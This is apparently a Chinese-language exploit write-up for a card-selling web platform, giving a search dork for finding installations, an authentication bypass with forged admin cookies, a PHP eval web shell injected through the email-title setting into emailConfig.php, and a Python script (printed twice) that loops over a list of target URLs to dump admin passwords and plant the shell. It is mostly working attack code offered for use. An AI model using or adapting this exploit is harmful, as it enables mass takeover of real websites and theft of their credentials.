ayang发卡平台getshell

漏洞搜索

1	inurl:admin/set.php

漏洞原因

admin后台文件校验cookie，可直接查看密码
后台设置有任意文件写入漏洞

漏洞代码

/admin/set.php

验证漏洞代码

if($.cookie("user") == null || $.cookie("user") == "" || $.cookie("loginInfo") != $.md5($.cookie("pass"))){
    	window.location.href='./login.php';
    }else{

    }

任意文件写入代码

1	elseif($_GET['mod']=="sfEmail"){
2	if($_POST['host'] == "" \|\| $_POST['port'] == "" \|\| $_POST['user'] == "" \|\| $_POST['from'] == ""){
3	showmsg("重要信息不能为空！");
4	exit();
5	}
6	$text="<?php
7	\$emailConfig = array(
8	'host'=>'".$_POST['host']."',//邮箱的服务器地址
9	'fromName'=>'".$_POST['fromName']."',//设置发件人姓名（昵称）任意内容
10	'port'=>'".$_POST['port']."',//端口
11	'user'=>'".$_POST['user']."',//邮箱账号
12	'pwd'=>'".$_POST['pwd']."',//邮箱密码
13	'from'=>'".$_POST['from']."',//设置发件人邮箱地址这里填入上述提到的“发件人邮箱”
14	'title'=>'".$_POST['title']."'//添加该邮件的主题
15	);
16	?>
17	";
18	saveFile("../emailConfig.php",$text);
19	showmsg("ok!",1);
20	}

漏洞利用

添加cookies：

COOKIES = {
            "user": "admin",
            "pass": "admin",
            "loginInfo": "21232f297a57a5a743894a0e4a801fc3"
            }

访问 http://domain/admin/set.php?mod=admin 看到管理员密码

进入系统设置->发件邮箱设置->邮件标题

1	a');$x=&$y; $y=$_POST['cmd']; function a() { global $x; return $x; } eval(a());?>/*

之后蚁剑连接 http://domain/emailConfig.php 密码cmd

漏洞EXP【py】

# encode=utf-8


# search inurl:admin.php
import requests
import re
import pyfiglet


COOKIES = {
            "user": "admin",
            "pass": "admin",
            "loginInfo": "21232f297a57a5a743894a0e4a801fc3"
            }


def geturls():
    with open("url.list") as f:
        urls = f.readlines()
        return urls


def check(url):
#    url = "http://debug.com"
    purl = url.strip() + "/admin/set.php?mod=admin"
    res = requests.post(purl, cookies=COOKIES)
    if res.status_code == 200:
        print("[+]Getting password")
        print(res.text)
#        getpass(res.text)
    else:
        exit("Got password failed")


def getpass(text):
    user = re.search(r'', text)
    pwd = re.search(r'管理员密码{30,50}', text)
    if user is not None and pwd is not None:
        print(user + " : " + pwd)
    else:
        exit("[-]Cant't find pass!")


def banner():
    pyfiglet.print_figlet("f a k a p a s s", colors="GREEN")


def write_shell(url):
    purl = url + "/admin/set.php?mod=sfEmail"
    data = {
            "host": "smtp.163.com",
            "fromName": "个人发卡平台",
            "port": "25",
            "user": "706672193",
            "pwd": "706672193",
            "from": "706672193@qq.com",
            "title": "a');$x=&$y; $y=$_POST['cmd']; function a() {     global $x;     return $x; } eval(a());?>/*",
            "submit": "修改"
            }
    res = requests.post(purl, data=data, cookies=COOKIES)
    if res.status_code == 200:
        print("[+]Write shell successfully!")
    else:
        print("[-]Write shell failed!")
        exit("exited")
    res = requests.get(url+"/emailConfig.php")
    if res.status_code == 200:
        print("[+]Shell path : "+url+"/emailConfig.php")
        print("[+]Shell password : cmd")
    else:
        print("[-]Shell path is changed !")


def mainf(isw=0):
    banner()
    urls = geturls()
    for url in urls:
        if url[0] == "#":
            continue
        if "http://" != url[0:7] and "https://" != url[0:8]:
            url = "http://" + url
        print("URL:" + url)
        check(url)
    if isw != 0:
        write_shell(url)


if __name__ == "__main__":
    mainf(1)

url写在另一个同目录文件url.list中

注

有的漏洞已经修复

1	if($.cookie("user") == null \|\| $.cookie("user") == "" \|\| $.cookie("loginInfo") != $.md5($.cookie("pass"))){
2	window.location.href='./login.php';
3	}else{
4
5	}

1	COOKIES = {
2	"user": "admin",
3	"pass": "admin",
4	"loginInfo": "21232f297a57a5a743894a0e4a801fc3"
5	}

1	# encode=utf-8
2
3
4	# search inurl:admin.php
5	import requests
6	import re
7	import pyfiglet
8
9
10	COOKIES = {
11	"user": "admin",
12	"pass": "admin",
13	"loginInfo": "21232f297a57a5a743894a0e4a801fc3"
14	}
15
16
17	def geturls():
18	with open("url.list") as f:
19	urls = f.readlines()
20	return urls
21
22
23	def check(url):
24	# url = "http://debug.com"
25	purl = url.strip() + "/admin/set.php?mod=admin"
26	res = requests.post(purl, cookies=COOKIES)
27	if res.status_code == 200:
28	print("[+]Getting password")
29	print(res.text)
30	# getpass(res.text)
31	else:
32	exit("Got password failed")
33
34
35	def getpass(text):
36	user = re.search(r'', text)
37	pwd = re.search(r'管理员密码{30,50}', text)
38	if user is not None and pwd is not None:
39	print(user + " : " + pwd)
40	else:
41	exit("[-]Cant't find pass!")
42
43
44	def banner():
45	pyfiglet.print_figlet("f a k a p a s s", colors="GREEN")
46
47
48	def write_shell(url):
49	purl = url + "/admin/set.php?mod=sfEmail"
50	data = {
51	"host": "smtp.163.com",
52	"fromName": "个人发卡平台",
53	"port": "25",
54	"user": "706672193",
55	"pwd": "706672193",
56	"from": "706672193@qq.com",
57	"title": "a');$x=&$y; $y=$_POST['cmd']; function a() { global $x; return $x; } eval(a());?>/*",
58	"submit": "修改"
59	}
60	res = requests.post(purl, data=data, cookies=COOKIES)
61	if res.status_code == 200:
62	print("[+]Write shell successfully!")
63	else:
64	print("[-]Write shell failed!")
65	exit("exited")
66	res = requests.get(url+"/emailConfig.php")
67	if res.status_code == 200:
68	print("[+]Shell path : "+url+"/emailConfig.php")
69	print("[+]Shell password : cmd")
70	else:
71	print("[-]Shell path is changed !")
72
73
74	def mainf(isw=0):
75	banner()
76	urls = geturls()
77	for url in urls:
78	if url[0] == "#":
79	continue
80	if "http://" != url[0:7] and "https://" != url[0:8]:
81	url = "http://" + url
82	print("URL:" + url)
83	check(url)
84	if isw != 0:
85	write_shell(url)
86
87
88	if __name__ == "__main__":
89	mainf(1)